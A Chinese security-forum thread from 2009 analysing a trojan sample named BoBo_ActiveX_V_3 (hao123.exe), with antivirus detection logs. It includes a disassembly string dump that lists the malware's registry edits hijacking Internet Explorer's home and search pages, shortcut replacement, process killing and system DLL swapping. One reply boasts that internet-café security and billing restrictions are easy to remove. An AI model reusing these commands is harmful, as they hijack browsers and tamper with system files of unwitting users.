这个东西可以干掉驱动防火墙

08红伞威点

Start of the scan: 2009年1月6日  17:01
Starting the file scan:

Begin scan in 'C:\Documents and Settings\***\桌面\BoBo_ActiveX_V_3.rar'
C:\Documents and Settings\***\桌面\BoBo_ActiveX_V_3.rar
    [0] Archive type: RAR
    --> BoBo_ActiveX_V_3.exe
      [DETECTION] Contains recognition pattern of the DR/Agent.azjs dropper
      --> BoBo_ActiveX_V_3.exe
        [1] Archive type: RAR SFX (self extracting)
        --> hao123.exe
          [DETECTION] Is the TR/Agent.azjs Trojan
    [NOTE]      A backup was created as '49a51e4a.qua'  ( QUARANTINE )
    [NOTE]      The file was deleted!
-----------------------------------------------------------------------------------------------------------
红伞S版(库V7.01.01.72)杀。

schumi小粉

2009-1-6 19:25:33        http://bbs.kafan.cn/attachment.p ... _V_3.exe/hao123.exe        Maxthon Browser        拒绝: Trojan.Win32.Agent.azjs        启发式分析计算的威胁级别值较高

Anycall-D908

额，我是小白菜。驱动防火墙的原原理是怎么样的我都不知道，我只知道他是保护驱动用的，其它一片空白..........囧

[ 本帖最后由 Anycall-D908 于 2009-1-6 20:31 编辑 ]

ranguangning

0.http://www.111333.com.cn

1.http://www.111333.com.cn/?in=Desktop

2.http://www.111333.com.cn/?in=SoftMenu

3. http://www.111333.com.cn/?in=QuickStart

4.go.bat：
@echo off
start /min hao123.exe

5.hao123.exe：
超级字串参考＋（罗聪）        
地址       反汇编                                    文本字串
004011D4   PUSH EBP                                  (初始 cpu 选择)
00401A4E   PUSH hao123.00401210                      reg add "hkey_classes_root\clsid\{871c5380-42a0-1069-a2ea-08002b30309d}\shell\openhomepage\command" /ve /t reg_sz /d "\"c:\program files\internet explorer\iexplore.exe\" http://www.5414.cn"  /f
00401A5E   PUSH hao123.004012F0                      reg add "hkey_current_user\software\microsoft\internet explorer\main" /v "start page" /t reg_sz /d "www.111333.com.cn/?in=starpage" /f
00401A6E   PUSH hao123.00401390                      reg add "hkey_current_user\software\microsoft\internet explorer\main" /v "search page" /t reg_sz /d "www.111333.com.cn/?in=iesearch" /f
00401A7E   PUSH hao123.00401430                      reg add "hkey_current_user\software\microsoft\internet explorer\main" /v "search bar" /t reg_sz /d "www.111333.com.cn/?in=iersearch" /f
00401A8E   PUSH hao123.004014D0                      reg add "hkey_current_user\software\microsoft\windows\currentversion\explorer\hidedesktopicons\classicstartmenu" /v "{871c5380-42a0-1069-a2ea-08002b30309d}" /t reg_dword /d "00000001" /f
00401A9E   PUSH hao123.00401590                      reg add "hkey_current_user\software\microsoft\windows\currentversion\explorer\hidedesktopicons\newstartpanel" /v "{871c5380-42a0-1069-a2ea-08002b30309d}" /t reg_dword /d "00000001" /f
00401AAE   PUSH hao123.00401650                      xcopy "1\lnternet  explorer.lnk" "%allusersprofile%\桌面\" /k /c /q /r /y
00401ABE   PUSH hao123.0040169B                      assoc .txt=txtfile
00401ACE   PUSH hao123.004016B0                      xcopy "2\lnternet  explorer.lnk" "%allusersprofile%\「开始」菜单\程序\" /k /c /q /r /y
00401ADE   PUSH hao123.00401710                      xcopy "3\lnternet  explorer.lnk" "%appdata%\microsoft\internet explorer\quick launch" /k /c /q /r /y
00401AEE   PUSH hao123.0040169B                      assoc .txt=txtfile
00401AFE   PUSH hao123.00401790                      reg delete hkey_classes_root\piffile /v isshortcut /f
00401B0E   PUSH hao123.004017D0                      reg delete hkey_classes_root\lnkfile /v isshortcut /f
00401B1E   PUSH hao123.00401810                      del "%allusersprofile%\..\*internet*.lnk" /s
00401B2E   PUSH hao123.00401850                      del "%allusersprofile%\..\*internet*.url" /s
00401B3E   PUSH hao123.00401890                      reg add "hkey_local_machine\software\clients\startmenuinternet\iexplore.exe\shell\open\command"  /ve /t reg_sz /d "c:\\program files\internet explorer\iexplore.exe  http://www.111333.com.cn/?in=startmenu" /f
00401B4E   PUSH hao123.00401962                      taskkill /f /im explorer.exe
00401B5E   PUSH hao123.0040197F                      taskkill /f /im iexplore.exe
00401B6E   PUSH hao123.004019B0                      rename %windir%\system32\shdoclc.dll shlos.rar
00401B7E   PUSH hao123.004019F0                      rename %windir%\system32\hao123.zip shdoclc.dll
00401B8E   PUSH hao123.0040197F                      taskkill /f /im iexplore.exe
00401B9E   PUSH hao123.00401962                      taskkill /f /im explorer.exe
00401BAE   PUSH hao123.00401A20                      cls
00401BBE   PUSH hao123.00401A24                      %systemroot%\explorer.exe

hum

panda
suspicious file [:1:]

清风拂红未有终

额，真的？
那还是8试的好

醉一生爱妍

让我囧之汗颜的是。。。

居然是一个批处理。。

伊の星

呃，想知道网吧的杀软是什么？
被干掉的驱动防火墙又是什么？
看24楼的反汇编，这被干掉的墙实在。。。

sxingang

这个文件我知道，是个在线视频的插件。
可以说是个间谍软件

woods12345

原帖由 wxb1994 于 2009-1-5 20:18 发表
哈哈哈哈哈～
我喜欢～～～～

最近有的网吧装了驱动防火墙，搞得我破解都受到影响，谢谢啦～～～

驱动防火墙很好破的 ，根本没得必要使用这些样本。你用安全工具或者HIPS类型的软件来破解，要是配合使用完全可以解除网吧所有安全限制,连收费的都可以连根删除。